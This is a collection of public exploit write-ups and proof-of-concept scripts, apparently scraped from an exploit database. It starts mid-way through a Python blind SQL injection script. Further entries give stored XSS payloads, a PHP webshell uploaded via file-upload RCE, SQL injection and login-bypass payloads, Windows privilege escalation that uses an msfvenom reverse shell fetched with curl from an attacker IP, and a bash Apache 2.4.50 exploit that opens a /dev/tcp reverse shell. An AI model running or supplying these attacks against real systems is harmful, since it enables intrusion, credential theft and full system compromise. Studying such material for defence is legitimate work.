            headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}
            data = {"pincode": f"' or (select(select (substring(password,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''}
            a = session.post(url, headers=headers, data=data)
            counter += 1
            if 'Course Enroll' in a.text:
                sys.stdout.write(j)
                sys.stdout.flush()
                break
            elif counter == len(pass_list): 
                find = True
                break
        if find:
            break

    print("\n\nSuccessfully pwnd :)")

def logo():
    art = R'''
__/\\\\\\\\\\\\\____/\\\\\\\\\\\__/\\\\\_____/\\\__/\\\\_________/\\\__        
 _\/\\\/////////\\\_\/////\\\///__\/\\\\\\___\/\\\_\///\\________\/\\\__       
  _\/\\\_______\/\\\_____\/\\\_____\/\\\/\\\__\/\\\__/\\/_________\/\\\__      
   _\/\\\\\\\\\\\\\/______\/\\\_____\/\\\//\\\_\/\\\_\//___________\/\\\__     
    _\/\\\/////////________\/\\\_____\/\\\\//\\\\/\\\__________/\\\\\\\\\__    
     _\/\\\_________________\/\\\_____\/\\\_\//\\\/\\\_________/\\\////\\\__   
      _\/\\\_________________\/\\\_____\/\\\__\//\\\\\\________\/\\\__\/\\\__  
       _\/\\\______________/\\\\\\\\\\\_\/\\\___\//\\\\\________\//\\\\\\\/\\_ 
        _\///______________\///////////__\///_____\/////__________\///////\//__
    '''
    info = 'CVE-2021-37357 PoC'.center(76)
    credits = 'Created by @AffineSecurity and @qhum7sec'.center(76)
    print(f"{art}\n{info}\n{credits}")

def main():
    logo()
    hostname = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    
    if len(sys.argv) != 4:
        print("Usage: python3 exploit.py http://127.0.0.1:80 username password")

    exploit(hostname, username, password)

if __name__ == '__main__':
    main()
HireHackking 
# Exploit Title: Netgear Genie 2.4.64 - Unquoted Service Path
# Exploit Author: Mert DAŞ
# Version: 2.4.64
# Date: 23.10.2021
# Vendor Homepage: https://www.netgear.com/
# Tested on: Windows 10

C:\Users\Mert>sc qc NETGEARGenieDaemon
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: NETGEARGenieDaemon
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\NETGEAR
Genie\bin\NETGEARGenieDaemon64.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : NETGEARGenieDaemon
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

Or:
-------------------------
C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr
/i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """


#Exploit:

A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other security
applications where it could potentially be executed during application
startup or reboot. If successful, the local user's code would execute with
the elevated privileges of the application.
HireHackking 
# Exploit Title: WordPress Plugin TaxoPress 3.0.7.1 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 23-10-2021
# Exploit Author: Akash Rajendra Patil
# Vendor Homepage:
# Software Link: https://wordpress.org/plugins/simple-tags/
# Tested on Windows
# CVE: CVE-2021-24444
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24444
# Reference: https://wpscan.com/vulnerability/a31321fe-adc6-4480-a220-35aedca52b8b


How to reproduce vulnerability:

1. Install Latest WordPress

2. Install and activate TaxoPress Version 3.0.7.1
3. Navigate to Add Table >> add the payload into 'Table Name & Descriptions'
and enter the data into the user input field.

4. Enter JavaScript payload which is mentioned below
"><img src=x onerror=confirm(docment.domain)>

5. You will observe that the payload successfully got stored into the
database and when you are triggering the same functionality in that
time JavaScript payload is executing successfully and we are getting a
pop-up.
HireHackking 
# Exploit Title: Engineers Online Portal 1.0 - File Upload Remote Code Execution (RCE)
# Date: 10/23/2021
# Exploit Author: SadKris
# Venor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html
# Version: 1.0
# Tested on: XAMPP, Windows 11

# ------------------------------------------------------------------------------------------
# POC
# ------------------------------------------------------------------------------------------

# Request sent as base user

POST /EngineerShit/teacher_avatar.php HTTP/1.1
Host: localhost.me
Content-Length: 510
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost.me
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygBJiBS0af0X03GTp
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost.me/EngineerShit/dasboard_teacher.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=tthnf1egn6dvjjpg9ackkglpfi
Connection: close

------WebKitFormBoundarygBJiBS0af0X03GTp
Content-Disposition: form-data; name="image"; filename="vuln.php"
Content-Type: application/octet-stream

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="x">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
if($_REQUEST['x']) {
  system($_REQUEST['x']);
  } else phpinfo();
?>
------WebKitFormBoundarygBJiBS0af0X03GTp
Content-Disposition: form-data; name="change"

# Response

HTTP/1.1 200 OK
Date: Sun, 24 Oct 2021 01:51:19 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12
X-Powered-By: PHP/8.0.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 119
Connection: close
Content-Type: text/html; charset=UTF-8

<script>
	window.location = "dasboard_teacher.php";
</script>

# ------------------------------------------------------------------------------------------
# Request to webshell
# ------------------------------------------------------------------------------------------

GET /EngineerShit/admin/uploads/vuln.php?x=echo%20gottem%20bois HTTP/1.1
Host: localhost.me
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=tthnf1egn6dvjjpg9ackkglpfi
Connection: close

# ------------------------------------------------------------------------------------------
# Webshell response
# ------------------------------------------------------------------------------------------

HTTP/1.1 200 OK
Date: Sun, 24 Oct 2021 01:54:07 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12
X-Powered-By: PHP/8.0.12
Content-Length: 154
Connection: close
Content-Type: text/html; charset=UTF-8

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="x">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
gottem bois
HireHackking 
# Exploit Title: Build Smart ERP 21.0817 - 'eidValue' SQL Injection (Unauthenticated)
# Date: 24/10/2021
# Exploit Author: Nehru Sethuraman
# Vendor Homepage: https://ribccs.com/solutions/solution-buildsmart
# Version: 21.0817
# Build: 3
# Google Dorks: intitle:buildsmart accounting
# Tested on: OS - Windows 2012 R2 or 8.1  & Database - Microsoft SQL Server 2014

Exploit Details:

URL: https://example.com/acc/validateLogin.asp?SkipDBSetup=NO&redirectUrl=

*HTTP Method:* POST

*POST DATA:*

VersionNumber=21.0906&activexVersion=3%2C9%2C0%2C0&XLImportCab=1%2C21%2C0%2C0&updaterActivexVersion=4%2C19%2C0%2C0&lang=eng&rptlang=eng&loginID=admin&userPwd=admin&EID=company&eidValue=company&userEmail=

Vulnerable Parameter: eidValue

SQL Injection Type: Stacked queries

Payload: ';WAITFOR DELAY '0:0:3'--
HireHackking 
# Exploit Title: OpenClinic GA 5.194.18 - Local Privilege Escalation
# Date: 2021-07-24
# Author: Alessandro Salzano
# Vendor Homepage: https://sourceforge.net/projects/open-clinic/
# Software Homepage: https://sourceforge.net/projects/open-clinic/
# Software Link: https://sourceforge.net/projects/open-clinic/files/latest/download
# Version: 5.194.18
# Tested on: Microsoft Windows 10 Enterprise x64

Open Source Integrated Hospital Information Management System.
OpenClinic GA is an open source integrated hospital information management system covering management of administrative, financial, clinical, lab, x-ray, pharmacy, meals distribution and other data. Extensive statistical and reporting capabilities.

Vendor: OpenClinic GA.

Affected version: > 5.194.18

# Details
# By default the Authenticated Users group has the modify permission to openclinic folders/files as shown below.
# A low privilege account is able to rename mysqld.exe or tomcat8.exe files located in bin folders and replace
# with a malicious file that would connect back to an attacking computer giving system level privileges
# (nt authority\system) due to the service running as Local System.
# While a low privilege user is unable to restart the service through the application, a restart of the
# computer triggers the execution of the malicious file.

The application also have unquoted service path issues.

(1) Impacted services.
Any low privileged user can elevate their privileges abusing MariaDB service:

C:\projects\openclinic\mariadb\bin\mysqld.exe


	Details:


SERVICE_NAME: OpenClinicHttp
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : c:\projects\openclinic\tomcat8\bin\tomcat8.exe //RS//OpenClinicHttp
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : OpenClinicHttp
        DEPENDENCIES       : Tcpip
                           : Afd
        SERVICE_START_NAME : NT Authority\LocalServic

--------

SERVICE_NAME: OpenClinicMySQL
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : c:\projects\openclinic\mariadb\bin\mysqld.exe --defaults-file=c:/projects/openclinic/mariadb/my.ini OpenClinicMySQL
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : OpenClinicMySQL
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem


(2) Folder permissions.
Insecure folders permissions issue:


icacls C:\projects\openclinic
C:\projects\openclinic Everyone:(I)(OI)(CI)(F)
                       NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)





                                # Proof of Concept

1. Generate malicious .exe on attacking machine
    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe

2. Setup listener and ensure apache is running on attacking machine
    nc -lvp 4242
    service apache2 start

3. Download malicious .exe on victim machine
    type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\projects\openclinic\mariadb\bin\mysqld_evil.exe"

4. Overwrite file and copy malicious .exe.
    Renename C:\projects\openclinic\mariadb\bin\mysqld.exe > mysqld.bak
    Rename downloaded 'mysqld_evil.exe' file in mysqld.exe

5. Restart victim machine

6. Reverse Shell on attacking machine opens
    C:\Windows\system32>whoami
    whoami
    nt authority\system
HireHackking 
# Exploit Title: Gestionale Open 11.00.00 - Local Privilege Escalation
# Date: 2021-07-19
# Author: Alessandro 'mindsflee' Salzano
# Vendor Homepage: https://www.gestionaleopen.org/
# Software Homepage: https://www.gestionaleopen.org/
# Software Link: https://www.gestionaleopen.org/wp-content/uploads/downloads/ESEGUIBILI_STANDARD/setup_go_1101.exe
# Version: 11.00.00
# Tested on: Microsoft Windows 10 Enterprise x64

With GO - Gestionale Open - it is possible to manage, check and print every aspect of accounting according to the provisions of Italian taxation.

Vendor: Gestionale Open srl.

Affected version: > 11.00.00


# Details
# By default the Authenticated Users group has the modify permission to Gestionale Open folders/files as shown below.
# A low privilege account is able to rename the mysqld.exe file located in bin folder and replace
# with a malicious file that would connect back to an attacking computer giving system level privileges
# (nt authority\system) due to the service running as Local System.
# While a low privilege user is unable to restart the service through the application, a restart of the
# computer triggers the execution of the malicious file.

The application also have unquoted service path issues.

(1) Impacted services.
Any low privileged user can elevate their privileges abusing MariaDB service:

C:\Gestionale_Open\MySQL57\bin\mysqld.exe


	Details:



SERVICE_NAME: DB_GO
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Gestionale_Open\MySQL57\bin\mysqld.exe --defaults-file=C:\Gestionale_Open\MySQL57\my.ini DB_GO
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DB_GO
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem



(2) Folder permissions.
Insecure folders permissions issue:


C:\Gestionale_Open Everyone:(I)(OI)(CI)(F)
                   NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)



                                # Proof of Concept

1. Generate malicious .exe on attacking machine
    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe

2. Setup listener and ensure apache is running on attacking machine
    nc -lvp 4242
    service apache2 start

3. Download malicious .exe on victim machine
    type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\Gestionale_Open\MySQL57\bin\mysqld_evil.exe"

4. Overwrite file and copy malicious .exe.
    Renename C:\Gestionale_Open\MySQL57\bin\mysqld.exe > mysqld.bak
    Rename downloaded 'mysqld_evil.exe' file in mysqld.exe

5. Restart victim machine

6. Reverse Shell on attacking machine opens
    C:\Windows\system32>whoami
    whoami
    nt authority\system
HireHackking 
# Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2)
# Credits: Ash Daulton & cPanel Security Team
# Date: 24/07/2021
# Exploit Author: TheLastVvV.com
# Vendor Homepage:  https://apache.org/
# Version: Apache 2.4.50 with CGI enable
# Tested on : Debian 5.10.28
# CVE : CVE-2021-42013

#!/bin/bash

echo 'PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI'
if [ $# -eq 0 ]
then
echo  "try: ./$0 http://ip:port LHOST LPORT"
exit 1
fi
curl "$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo Content-Type: text/plain; echo; echo '/bin/sh -i >& /dev/tcp/$2/$3 0>&1' > /tmp/revoshell.sh" && curl "$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo Content-Type: text/plain; echo; bash  /tmp/revoshell.sh"

#usage chmod -x CVE-2021-42013.sh
#./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT
HireHackking 
# Exploit Title: Balbooa Joomla Forms Builder 2.0.6 - SQL Injection (Unauthenticated)
# Date: 24.10.2021
# Exploit Author: blockomat2100
# Vendor Homepage: https://www.balbooa.com/
# Version: 2.0.6
# Tested on: Docker

An example request to trigger the SQL-Injection:

POST /index.php?option=com_baforms HTTP/1.1
Host: localhost
Content-Length: 862
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTAak6w3vHUykgInT
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: 7b1c9321dbfaa3e34d2c66e9b23b9d21=016d065924684a506c09304ba2a13035
Connection: close

------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="1"

{"1":{"submission_id":0,"form_id":1,"field_id":1,"name":"test.png","filename":"test.png","date":"2021-09-28-17-19-51","id":"SQLI"}}
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="form-id"

1
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="task"

form.message
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="submit-btn"

2
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="page-title"

Home
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="page-url"

http://localhost/
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="page-id"

0
------WebKitFormBoundaryTAak6w3vHUykgInT--
HireHackking 
# Exploit Title: Engineers Online Portal 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)
# Exploit Author: Alon Leviev
# Date: 22-10-2021
# Category: Web application
# Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip
# Version: 1.0
# Tested on: Kali Linux 
# CVE : cve-2021-42664
# Vulnerable page: add_quiz.php
# Vulnerable Parameters: "quiz_title", "description"

Technical description:
A stored XSS vulnerability exists in the Engineers Online Portal. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more. 

Steps to exploit:
1) Navigate to http://localhost/nia_munoz_monitoring_system/add_quiz.php
2) Insert your payload in the "quiz_title" parameter or the "description" parameter
3) Click save

Proof of concept (Poc):
The following payload will allow you to run the javascript - 
<script>alert("This is an XSS Give me your cookies")</script>

---

POST /nia_munoz_monitoring_system/add_quiz.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
Origin: http://localhost
Connection: close
Referer: http://localhost/nia_munoz_monitoring_system/add_quiz.php
Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9
Upgrade-Insecure-Requests: 1

quiz_title=%3Cscript%3Ealert%28%22This+is+an+XSS%22%29%3C%2Fscript%3E&description=xss&save=

OR

POST /nia_munoz_monitoring_system/edit_quiz.php?id=6 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Origin: http://localhost
Connection: close
Referer: http://localhost/nia_munoz_monitoring_system/edit_quiz.php?id=6
Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9
Upgrade-Insecure-Requests: 1

quiz_id=6&quiz_title=xss&description=%3Cscript%3Ealert%28%22This+is+an+xss%22%29%3C%2Fscript%3E&save=

---
HireHackking 
# Exploit Title: Online Event Booking and Reservation System 1.0 - 'reason' Stored Cross-Site Scripting (XSS)
# Exploit Author: Alon Leviev
# Date: 22-10-2021
# Category: Web application
# Vendor Homepage: https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/event-management.zip
# Version: 1.0
# Tested on: Linux 
# Vulnerable page: HOLY
# Vulnerable Parameters: "reason"

Technical description:
A stored XSS vulnerability exists in the Event management software. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more. 

Steps to exploit:
1) Navigate to http://localhost/event-management/views/?v=HOLY
2) Insert your payload in the "reason" parameter
3) Click "Add holiday"

Proof of concept (Poc):
The following payload will allow you to run the javascript - 
<script>alert("This is an XSS")</script>
---

POST /event-management/api/process.php?cmd=holiday HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
Origin: http://localhost
Connection: close
Referer: http://localhost/event-management/views/?v=HOLY&msg=Holiday+record+successfully+deleted.
Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9
Upgrade-Insecure-Requests: 1

date=2021-12-21&reason=%3Cscript%3Ealert%28%22This+is+an+xss%22%29%3C%2Fscript%3E

---
HireHackking 
# Exploit Title: Engineers Online Portal 1.0 - 'id' SQL Injection 
# Exploit Author: Alon Leviev
# Date: 22-10-2021
# Category: Web application
# Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip
# Version: 1.0
# Tested on: Kali Linux 
# Vulnerable page: quiz_question.php
# Vulnerable Parameter: "id"

Technical description:
An SQL Injection vulnerability exists in the Engineers Online Portal. An attacker can leverage the vulnerable "id" parameter in the "quiz_question.php" web page in order to manipulate the sql query performed.
As a result he can extract sensitive data from the web server and in some cases he can use this vulnerability in order to get a remote code execution on the remote web server. 

Steps to exploit:
1) Navigate to http://localhost/nia_munoz_monitoring_system/quiz_question.php
2) Insert your payload in the id parameter

Proof of concept (Poc):
The following payload will allow you to extract the MySql server version running on the web server -
' union select NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL;-- -

---

GET /nia_munoz_monitoring_system/quiz_question.php?id=3%27%20union%20select%20NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL--%20- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9
Upgrade-Insecure-Requests: 1

---
HireHackking 
# Exploit Title: WordPress Plugin Media-Tags 3.2.0.2 - Stored Cross-Site Scripting (XSS)
# Date: 25-10-2021
# Exploit Author: Akash Rajendra Patil
# Vendor Homepage: https://wordpress.org/plugins/media-tags/
# Software Link: www.codehooligans.com/projects/wordpress/media-tags/
# Version: 3.2.0.2
# Tested on Windows

*How to reproduce vulnerability:*

1. Install Latest WordPress

2. Install and activate Media-Tags <= 3.2.0.2
3. Navigate to Add Table >> add the payload into 'Media Tag Label Fields' and enter the data into the user input field.

4. Enter JavaScript payload which is mentioned below
"><img src=x onerror=confirm(docment.domain)>

5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.
HireHackking 
# Exploit Title: Engineers Online Portal 1.0 - 'multiple' Authentication Bypass
# Exploit Author: Alon Leviev
# Date: 22-10-2021
# Category: Web application
# Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip
# Version: 1.0
# Tested on: Kali Linux 
# Vulnerable page: login.php
# VUlnerable parameters: "username", "password"

Technical description:
An SQL Injection vulnerability exists in the Engineers Online Portal login form which can allow an attacker to bypass authentication. 

Steps to exploit:
1) Navigate to http://localhost/nia_munoz_monitoring_system/login.php
2) Insert your payload in the user or password field 
3) Click login

Proof of concept (Poc):
The following payload will allow you to bypass the authentication mechanism of the Engineers Online Portal login form - 
' OR '1'='1';-- -

--- 

POST /nia_munoz_monitoring_system/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 41
Origin: http://localhost
Connection: close
Referer: http://localhost/nia_munoz_monitoring_system/
Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9

username='+or+'1'%3D'1'%3B--+-&password=sqli

OR

POST /nia_munoz_monitoring_system/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 44
Origin: http://localhost
Connection: close
Referer: http://localhost/nia_munoz_monitoring_system/
Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9

username=sqli&password='+or+'1'%3D'1'%3B--+-

---
HireHackking 
# Exploit Title: WordPress Plugin Ninja Tables 4.1.7 - Stored Cross-Site Scripting (XSS)
# Date: 25-10-2021
# Exploit Author: Akash Rajendra Patil
# Vendor Homepage: https://wordpress.org/plugins/ninja-tables/
# Software Link: https://wpmanageninja.com/downloads/ninja-tables-pro-add-on/
# Version: 4.1.7
# Tested on Windows

*How to reproduce vulnerability:*

1. Install Latest WordPress

2. Install and activate Ninja Tables <= 4.1.7
3. Enter JavaScript payload which is mentioned below
"><img src=x onerror=confirm(docment.domain)> in the 'Coulmn Name & Add Data'
and enter the data into the user input field.Then Navigate to Table Design

5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.